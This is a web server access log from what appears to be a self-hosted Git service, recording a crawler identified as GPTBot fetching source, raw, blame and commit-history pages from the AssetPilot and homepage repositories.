"/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/start.sh?display=rendered" [Client 74.7.227.38] [Length 10935] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/start.sh" -[17/Feb/2026:15:30:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2fAnalysis-00.toc" [Client 74.7.227.38] [Length 26859] [Gzip 7.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:15:30:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2fAnalysis-00.toc" [Client 74.7.227.38] [Length 17162] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:15:30:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=PythonTest%2fGitea_Manual.md" [Client 74.7.227.38] [Length 37155] [Gzip 6.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/Gitea_Manual.md" -[17/Feb/2026:15:30:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=PythonTest%2fmain.py" [Client 74.7.227.38] [Length 35235] [Gzip 7.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/main.py" -[17/Feb/2026:15:30:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 11567] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:30:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 11065] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:30:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 11529] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:30:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 11066] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:30:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old" -[17/Feb/2026:15:30:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 27435] [Gzip 7.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/js" -[17/Feb/2026:15:30:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 11554] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:30:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 11540] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:30:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 12163] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:30:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 2221] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.fish" -[17/Feb/2026:15:30:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/httpx" [Client 74.7.227.38] [Length 11527] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:30:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 10430] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3.12" -[17/Feb/2026:15:30:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python" -[17/Feb/2026:15:30:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 10421] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/uvicorn" -[17/Feb/2026:15:30:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 9991] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python" -[17/Feb/2026:15:30:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/uvicorn" -[17/Feb/2026:15:30:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 10191] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/js/app.js" -[17/Feb/2026:15:30:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 37081] [Gzip 12.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/js/app.js" -[17/Feb/2026:15:30:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/dotenv" -[17/Feb/2026:15:30:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/dotenv?display=source" [Client 74.7.227.38] [Length 11557] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/dotenv" -[17/Feb/2026:15:30:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 10420] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/dotenv" -[17/Feb/2026:15:30:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/httpx" [Client 74.7.227.38] [Length 9946] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/httpx" -[17/Feb/2026:15:30:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 11444] [Gzip 4.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.csh" -[17/Feb/2026:15:30:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3.12" -[17/Feb/2026:15:30:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/httpx" [Client 74.7.227.38] [Length 248] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/httpx" -[17/Feb/2026:15:30:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 7] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3.12" -[17/Feb/2026:15:30:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip" -[17/Feb/2026:15:30:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.csh" -[17/Feb/2026:15:30:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 256] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/dotenv" -[17/Feb/2026:15:30:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 17770] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/js/app.js" -[17/Feb/2026:15:30:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/httpx" [Client 74.7.227.38] [Length 10412] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/httpx" -[17/Feb/2026:15:30:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 10427] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip" -[17/Feb/2026:15:30:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 9984] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3.12" -[17/Feb/2026:15:30:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 7] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python" -[17/Feb/2026:15:30:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 255] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/uvicorn" -[17/Feb/2026:15:30:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/components/Services.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/components/Services.tsx" -[17/Feb/2026:15:30:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/components/Services.tsx" -[17/Feb/2026:15:30:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 13885] [Gzip 4.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host" -[17/Feb/2026:15:30:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 12758] [Gzip 4.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host" -[17/Feb/2026:15:30:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/components/Footer.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/components/Footer.tsx" -[17/Feb/2026:15:30:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/components/Footer.tsx" -[17/Feb/2026:15:30:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/components/Header.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/components/Header.tsx" -[17/Feb/2026:15:30:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/components/Header.tsx" -[17/Feb/2026:15:30:52 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/js/$%7BgetInvestingUrl(symbol)%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/js/app.js" -[17/Feb/2026:15:30:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa?files=.TemporaryDocument" [Client 74.7.227.38] [Length 17132] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument" -[17/Feb/2026:15:30:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/tsconfig.json?display=rendered" [Client 74.7.227.38] [Length 10872] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/tsconfig.json" -[17/Feb/2026:15:30:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10863] [Gzip 2.95] [Sent-to 192.168.0.250] 